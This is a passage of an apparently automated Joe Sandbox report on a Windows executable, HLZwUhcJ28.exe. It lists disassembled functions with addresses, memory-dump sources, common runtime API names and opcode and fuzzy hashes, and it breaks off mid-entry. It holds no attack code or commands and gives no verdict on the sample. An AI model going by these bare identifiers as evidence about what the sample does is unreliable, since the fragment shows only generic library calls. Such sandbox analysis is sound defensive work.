                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 2466640111-1018135373
                                                                                                                                                                          • Opcode ID: 3b2257290adfa2781d5b09c2d1616d864f17ca53d9f431228db0fbfec44e584e
                                                                                                                                                                          • Instruction ID: e6edd3536bd238c966d362c21ee889adbe6b972054cdf93749a3dd3cd156f6b1
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b2257290adfa2781d5b09c2d1616d864f17ca53d9f431228db0fbfec44e584e
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F519C37A1874297EA24AB16E85136FB7A4FB88B90F900535EB8D47B55CF3DE060CB10
                                                                                                                                                                          Function 00007FF70ED07874 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                          • String ID: U
                                                                                                                                                                          • API String ID: 2456169464-4171548499
                                                                                                                                                                          • Opcode ID: d20302cc878b90de32ea97a9ef5a303d772ca5a33c3583031ee23a301797e927
                                                                                                                                                                          • Instruction ID: ceca512d60750a98db0198f2d0342dfdcf635d9df798a318473f74de6a6f3c53
                                                                                                                                                                          • Opcode Fuzzy Hash: d20302cc878b90de32ea97a9ef5a303d772ca5a33c3583031ee23a301797e927
                                                                                                                                                                          • Instruction Fuzzy Hash: 0141A522B19A4592E720AF25F8443BAB761FB88794F854032EE8D8B784DF3CE541C750
                                                                                                                                                                          Function 00007FF70ECECCEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ObjectRelease
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1429681911-3916222277
                                                                                                                                                                          • Opcode ID: 617a757d8815b9cd64aff0be7c79d33489404464c5a4c9318e7e7076e56f3154
                                                                                                                                                                          • Instruction ID: 1939a49cbd80c54f19a789b0597042269915a315080764277be0f19fbc55c6ea
                                                                                                                                                                          • Opcode Fuzzy Hash: 617a757d8815b9cd64aff0be7c79d33489404464c5a4c9318e7e7076e56f3154
                                                                                                                                                                          • Instruction Fuzzy Hash: B2314A36B1874686DA04AF26BD1876AB7A1FB89FD1F904135ED8A43B24CF3CD4498B00
                                                                                                                                                                          Function 00007FF70ECEC21C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDeviceRelease
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 127614599-3916222277
                                                                                                                                                                          • Opcode ID: a4f30ad7dfa2e76a7ae327bbc05fad838edf44ef71ac395416f8be742774f962
                                                                                                                                                                          • Instruction ID: 7481513c9831b6bbf62ba5c9e8fd67b6496d184a90563ecc7025492ef49cb00d
                                                                                                                                                                          • Opcode Fuzzy Hash: a4f30ad7dfa2e76a7ae327bbc05fad838edf44ef71ac395416f8be742774f962
                                                                                                                                                                          • Instruction Fuzzy Hash: 36E0C231F0864582EB4867BAFA8913AA261EF4CBD0F954035DA0E83795DF3DC8C54300
                                                                                                                                                                          Function 00007FF70ECD7644 Relevance: 6.3, APIs: 4, Instructions: 281COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FoldString_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2025052027-0
                                                                                                                                                                          • Opcode ID: 6885311f977ff8b5915e7910640fa07167ed4e933460e8e7d633901c21ad58a3
                                                                                                                                                                          • Instruction ID: 4a75cbd6455bd7f07b510d3a492a2e993fcd7c6a337c02f0a629d77fdc55a904
                                                                                                                                                                          • Opcode Fuzzy Hash: 6885311f977ff8b5915e7910640fa07167ed4e933460e8e7d633901c21ad58a3
                                                                                                                                                                          • Instruction Fuzzy Hash: DFB1C222F2C746A1EA10AB19D84866EA3A1FF44BA4FD58537DA1D07794DF7FE490C320
                                                                                                                                                                          Function 00007FF70ECDFCDC Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                          • Opcode ID: 318763212630b9f8aa6bd02c91178889ead5250ce24bd63f2b84e46bdd677746
                                                                                                                                                                          • Instruction ID: 2b42adc45f080ab18db16af74a6de3ad256bd84a9799f0e0dacdbc4c472272a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 318763212630b9f8aa6bd02c91178889ead5250ce24bd63f2b84e46bdd677746
                                                                                                                                                                          • Instruction Fuzzy Hash: 5751A662B18B82A5EB00FB74D8542EDA321FF85B88F804136DA5D57B96DF3AD544C350
                                                                                                                                                                          Function 00007FF70ECED908 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1077098981-0
                                                                                                                                                                          • Opcode ID: 5e20d32f705fb8afae232702789ae5b6ccc28567c60846b1c728c17defa930fd
                                                                                                                                                                          • Instruction ID: dc00c152a0baabc754f4602a83c9b7e880530b58138f49b6adef4445bff95aeb
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e20d32f705fb8afae232702789ae5b6ccc28567c60846b1c728c17defa930fd
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E51A032A18B4296E710AF21E8447AEB7B4FF88B88F901035EA4E57B58DF3DD544CB10
                                                                                                                                                                          Function 00007FF70ED0106C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4141327611-0
                                                                                                                                                                          • Opcode ID: 8d9a5625d90a928a2b0668c470320c834cfc61c5ffddc2be44e89749fafbb7da
                                                                                                                                                                          • Instruction ID: 682238ad215c0676da8f31f2e4d2b9db3ef6da9e6077f2c53774b671cc729a8d
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d9a5625d90a928a2b0668c470320c834cfc61c5ffddc2be44e89749fafbb7da
                                                                                                                                                                          • Instruction Fuzzy Hash: 7241C621E0E74246FB69BB11D8503B9E6A0EF84B90F9C4130DA9D87AD5CF3CDD418721
                                                                                                                                                                          Function 00007FF70ED04008 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF70ECFF93B), ref: 00007FF70ED04021
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF70ECFF93B), ref: 00007FF70ED04083
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF70ECFF93B), ref: 00007FF70ED040BD
                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF70ECFF93B), ref: 00007FF70ED040E7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1557788787-0
                                                                                                                                                                          • Opcode ID: 6509991160e12f712ad6d4b27e048ebbd13574e2c5e48816f306a01bcccb75f3
                                                                                                                                                                          • Instruction ID: 8e6baa2666b595bee4556cfa22545e87e0ebe742ce5f622e167d87a37cd9a11b
                                                                                                                                                                          • Opcode Fuzzy Hash: 6509991160e12f712ad6d4b27e048ebbd13574e2c5e48816f306a01bcccb75f3
                                                                                                                                                                          • Instruction Fuzzy Hash: FD216121F0879685E620AF12A84062AF6A5FF44BD0B8C4135DF9EB3BD4DF3CE9528710
                                                                                                                                                                          Function 00007FF70ED00950 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF70ECFB380,?,?,00000050,00007FF70ECFD3C1), ref: 00007FF70ED0095A
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF70ECFB380,?,?,00000050,00007FF70ECFD3C1), ref: 00007FF70ED009C2
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF70ECFB380,?,?,00000050,00007FF70ECFD3C1), ref: 00007FF70ED009D8
                                                                                                                                                                          • abort.LIBCMT ref: 00007FF70ED009DE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1447195878-0
                                                                                                                                                                          • Opcode ID: 1eac2c9eaf67b8ca3847dbe3d1f8f0efe6c7906f8c8004aecd08eca7f3519a74
                                                                                                                                                                          • Instruction ID: 67d99b1d5663e1b0d1c1f8cee6a3b7e16ddfeb7ab0753f86f6fa21bc28d77d09
                                                                                                                                                                          • Opcode Fuzzy Hash: 1eac2c9eaf67b8ca3847dbe3d1f8f0efe6c7906f8c8004aecd08eca7f3519a74
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E019E20F0D20652FAA87735AE5937CD182DF44780F9C0939D96E837D6EF6CA8404230
                                                                                                                                                                          Function 00007FF70ECEC1CC Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1035833867-0
                                                                                                                                                                          • Opcode ID: ff8273f54fae2fdeddf750fc197cbb143a8813763f49c02ea24deae08297ea60
                                                                                                                                                                          • Instruction ID: 638960e352590ae05aaa4f81830e948ddddd9d93acae068bfab199be9f8d378b
                                                                                                                                                                          • Opcode Fuzzy Hash: ff8273f54fae2fdeddf750fc197cbb143a8813763f49c02ea24deae08297ea60
                                                                                                                                                                          • Instruction Fuzzy Hash: A8E04870F0974682FF087BB5AC59176E191EF48B45FC44039C80E473A0EF3EA4854720
                                                                                                                                                                          Function 00007FF70ED01704 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID: e+000$gfff
                                                                                                                                                                          • API String ID: 3215553584-3030954782
                                                                                                                                                                          • Opcode ID: 180a713344d636e9f2ed807591016252dc9e7b78ba41607e6542638bc7fc855a
                                                                                                                                                                          • Instruction ID: 31876396420b1d7a35f90179e2742b796cdf578922a3dc54305214479c91cdc1
                                                                                                                                                                          • Opcode Fuzzy Hash: 180a713344d636e9f2ed807591016252dc9e7b78ba41607e6542638bc7fc855a
                                                                                                                                                                          • Instruction Fuzzy Hash: 1B512562B197C296E7259B359C40369AB91EF81B90F8C8271C79C8BBD5CF3DD444C710
                                                                                                                                                                          Function 00007FF70ECD9808 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                                                                                                          • String ID: SIZE
                                                                                                                                                                          • API String ID: 449872665-3243624926
                                                                                                                                                                          • Opcode ID: f97aaaf949171a2904a8fe23ed725e9e394508c7fb8bb295341962652909a67e
                                                                                                                                                                          • Instruction ID: 18f9b08219de69d63912504081f23f9c09638a3517c239abf97ae508ead93838
                                                                                                                                                                          • Opcode Fuzzy Hash: f97aaaf949171a2904a8fe23ed725e9e394508c7fb8bb295341962652909a67e
                                                                                                                                                                          • Instruction Fuzzy Hash: A241B362A1C782A5EA10BB15E8453BFE350EFC9790F904231EA9D066DAEFBFD541C710
                                                                                                                                                                          Function 00007FF70ECFF7A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                          • String ID: C:\Users\user\Desktop\HLZwUhcJ28.exe
                                                                                                                                                                          • API String ID: 3307058713-1136380477
                                                                                                                                                                          • Opcode ID: d741bd9ac7dff40685a7c943ead455491a0e4fb3fffc5812c1fd7ad0a856b466
                                                                                                                                                                          • Instruction ID: 62f67f09bbdd0a83d343b3fdd3b2bb76cb0aacd7e3b651c0653ecb7adefd8e55
                                                                                                                                                                          • Opcode Fuzzy Hash: d741bd9ac7dff40685a7c943ead455491a0e4fb3fffc5812c1fd7ad0a856b466
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C419232A08796A9E715EF259C501BDF794EF447D4B98403AE94D87B85DF3EE8418320
                                                                                                                                                                          Function 00007FF70ECD9A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide_snwprintf
                                                                                                                                                                          • String ID: $%s$@%s
                                                                                                                                                                          • API String ID: 2650857296-834177443
                                                                                                                                                                          • Opcode ID: 9a1500ef5950f5f5df7c550d69d7960993ad2cdd50597e18fe19dfb01623cb94
                                                                                                                                                                          • Instruction ID: f4eccb2bd2b6936ed18b15925f80e06c0fc68f31b84d8db74aac39a1a9164566
                                                                                                                                                                          • Opcode Fuzzy Hash: 9a1500ef5950f5f5df7c550d69d7960993ad2cdd50597e18fe19dfb01623cb94
                                                                                                                                                                          • Instruction Fuzzy Hash: 2131E576B1CA46A5EA20AF65E8407FAA7A0FF84784F801032EE0D07B95DF7EE505C710
                                                                                                                                                                          Function 00007FF70ECE00F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
